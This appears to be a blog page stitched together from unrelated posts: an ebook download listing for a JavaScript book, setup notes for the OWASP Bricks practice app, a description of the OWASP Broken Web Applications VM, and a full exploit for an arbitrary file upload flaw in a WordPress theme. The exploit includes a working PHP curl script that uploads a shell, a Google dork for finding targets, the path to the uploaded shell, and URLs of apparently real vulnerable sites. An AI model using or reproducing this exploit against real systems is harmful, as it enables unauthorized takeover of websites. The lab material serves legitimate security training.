Download: Tusfiles Solidfiles
Book Description
If you want to achieve JavaScript's full potential, it is critical to understand its nature, history, and limitations. To that end, this updated version of the bestseller by veteran author and JavaScript guru Nicholas C. Zakas covers JavaScript from its very beginning to the present-day incarnations including the DOM, Ajax, and HTML5. Zakas shows you how to extend this powerful language to meet specific needs and create dynamic user interfaces for the web that blur the line between desktop and internet. By the end of the book, you'll have a strong understanding of the significant advances in web development as they relate to JavaScript so that you can apply them to your next website.Book Details | |
| Publisher: | Wrox |
| By: | Nicholas C. Zakas |
| ISBN: | 978-1-1180-2669-4 |
| Year: | 2012 |
| Pages: | 960 |
| Language: | English |
| File size: | 53.1 MB |
| File format: | |
eBook | |
| Download: | Professional JavaScript for Web Developers, 3rd Edition |
Download: Solidfiles
==Installation==
Copy this folder into the www directory.
Start running the server.
Create a new database for Bricks:
Click on the PHPMyAdmin button or go to http://<your_ip>/mysql/ on browser.
Any name can be used for database. For example: bricks. Fill up the name and click on Create button.
Go to http://<your_ip>/bricks/ on browser.
Bricks will redirect automatically to http://<your_ip>/bricks/config/.
Fill in the configuration details:
Database username: root
Database password: root in uWAMP. Keep it blank in the case of XAMPP
Database name: bricks
Database host: localhost
Show executed commands: checked by default
Click on Submit button and a file, LocalSettings.php, will get downloaded. Place this file in the www directory.
Refresh http://<your_ip>/bricks/config/ page
Click on Setup/reset database
Installation finished. Bricks will be ready at http://<your_ip>/bricks/
==Upgrading==
Copy the contents of this directory on to the existing Bricks installation directory.
==Websites==
http://sechow.com/bricks/
https://www.owasp.org/index.php/OWASP_Bricks
http://packetstormsecurity.com/files/download/123800/OWASP_Bricks_-_Dakatua.zip
######################################################
# Exploit Title: WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability
# Author: Smail Max
# Date: 10/31/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/coldfusion-r...io/4381748
# Google dork: inurl:wp-content/themes/ColdFusion/
######################################################
= = = = = = = =
1)Exploit =
2)Real Demo =
= = = = = = = =
1)Exploit :
= = = = = =
<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
2) Exploit demo :
= = = = = = = = =
http://www.laughingcowproductions.com/wp..._image.php
http://www.alias-photo.com/wp-content/th..._image.php
http://www.manuel-portela.com/wp-content..._image.php
# #### #### #### #### #### #### #### #### #
Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php
# #### #### #### #### #### #### #### #### #
# Facebook Profile : http://www.fb.com/smailmax
# E-mail : ur0@hotmail.com
# #### #### #### #### #### #### #### #### #
##### Fi Khatr : > Smail Fox, Ped Rou, Ŝimõõw Any #####
##### Safouane Saw, RootMax, DrShano, Novice Exe #####
##### Abdelaziz Babiz, Youness El Amri, Salah Soultan #####
##### Âh Mêd, Docteur Virùs, Le-MîSstèr Tàriik #####
##### Sam7o Li Ila Nsit Chi Wa7d :( ./Smail Max #####
##### W A L I D A <3 #####
The Broken Web Applications (BWA) Project is a collection of vulnerable web applications that is distributed on a Virtual Machine.
- Learning about web application security
- Testing manual assessment techniques
- Testing automated tools
- Testing source code analysis tools
- Observing web attacks
- Testing WAFs and similar code technologies
- All the while saving people interested in doing either learning or testing the pain of having to compile, configure, and catalog all of the things normally involved in doing this process from scratch.
Changelog v1.1 (2013-07-30)
- Updated Mutillidae, Cyclone, and WAVSEP.
- Updated OWASP Bricks and configured it to pull from SVN.
- Fixed ModSecurity CRS blocking and rebuilt ModSecurity to include LUA support.
- Increased VM’s RAM allocation to 1Gb.
- Set Tomcat to run as root (to allow some traversal issues tested by WAVSEP).
- Updated landing page for OWASP 1-Liner to reflect that the application is not fully functional.
More Information: here
Subscribe to:
Posts (Atom)
